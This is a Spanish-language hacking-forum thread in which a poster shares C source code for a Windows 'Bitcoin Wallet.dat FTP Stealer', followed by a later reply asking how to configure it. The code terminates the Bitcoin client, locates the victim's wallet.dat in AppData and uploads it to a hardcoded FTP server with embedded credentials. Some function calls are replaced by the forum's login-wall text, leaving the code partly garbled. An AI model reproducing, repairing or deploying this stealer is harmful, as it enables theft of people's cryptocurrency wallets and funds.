comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bitcoin Wallet.dat FTP Stealer Source

  • 1 Respuestas
  • 4747 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    75%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Abril 12, 2012, 02:45:11 pm »
Código: C
  1. // Coded by JuryBen
  2. // Gimme coins
  3. // 1LEXm6E4L9Ug9VNpkvXwJiZb61tspRiK7v
  4.  
  5. #include <windows.h>
  6. #include <tlhelp32.h>
  7. #include <tchar.h>
  8. #include <wininet.h>
  9. #include <ctime>
  10. #include <iostream>
  11. #pragma comment(lib, "wininet")
  12.  
  13. void killprocess()
  14.         {    
  15.  
  16.                 HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );         // Get the process list snapshot.
  17.                 PROCESSENTRY32 ProcessEntry = { 0 };                                    // Initialize the process entry structure.
  18.                 ProcessEntry.dwSize = sizeof( ProcessEntry );                   // Get the first process info
  19.                 BOOL Return = FALSE;
  20.                 Return = Process32First( hProcessSnapShot,&ProcessEntry );
  21.  
  22.                 int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
  23.                 if (value==0)
  24.                         {
  25.                                 HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); //Open Process to terminate
  26.                                 TerminateProcess(hProcess,0);
  27.                                 CloseHandle(hProcess); //Close Handle }
  28.                
  29.                         }
  30.  
  31.         while( Process32Next( hProcessSnapShot, &ProcessEntry ));
  32.         CloseHandle( hProcessSnapShot );
  33. }
  34.  
  35. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  36. {
  37.        
  38.         killprocess();
  39.         Sleep(40000);
  40.         No tienes permisos para ver links. Registrate o Entra con tu cuenta((unsigned)No tienes permisos para ver links. Registrate o Entra con tu cuenta(NULL));                    // we get time to use for random seed
  41.         int seedone=No tienes permisos para ver links. Registrate o Entra con tu cuenta();                                             // seed one
  42.     int seedtwo=No tienes permisos para ver links. Registrate o Entra con tu cuenta()*3;                                       // seed two times 3
  43.         int seedboth = seedone + seedtwo;               // combine seeds to ensure random int
  44.                                                                                         // now we need to convert int to char
  45.         char randomseed[99];                                    // make randomseed buffer at 99 to prevent overflow
  46.     No tienes permisos para ver links. Registrate o Entra con tu cuenta(seedboth,randomseed,10);                       // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
  47.                                                                                         // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
  48.        
  49.         char* appdata = No tienes permisos para ver links. Registrate o Entra con tu cuenta("APPDATA");              //Gets %Appdata% path
  50.         char* truepath = No tienes permisos para ver links. Registrate o Entra con tu cuenta(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
  51.  
  52.         //ftp connection
  53.         HINTERNET hInternet;
  54.         HINTERNET hFtpSession;
  55.         hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  56.         hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
  57.  
  58.         FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
  59.         FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
  60.  
  61.         InternetCloseHandle(hFtpSession);
  62.         InternetCloseHandle(hInternet);
  63.        
  64.         return 0;
  65. }

Autor: itz me
« Última modificación: Febrero 08, 2014, 05:45:10 pm por Expermicid »


Desconectado drako123

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 11, 2018, 03:44:26 pm »
Hola antrax es un keyloger o un miner, como se configura.

 

¿Te gustó el post? COMPARTILO!



[Source C++] Visualizando en pantalla lo que envia el microcontrolador(PIC).

Iniciado por Turka

Respuestas: 2
Vistas: 1891
Último mensaje Diciembre 03, 2012, 09:06:34 am
por Sanko
Stealer MSN

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2592
Último mensaje Junio 22, 2011, 02:28:47 pm
por startsgame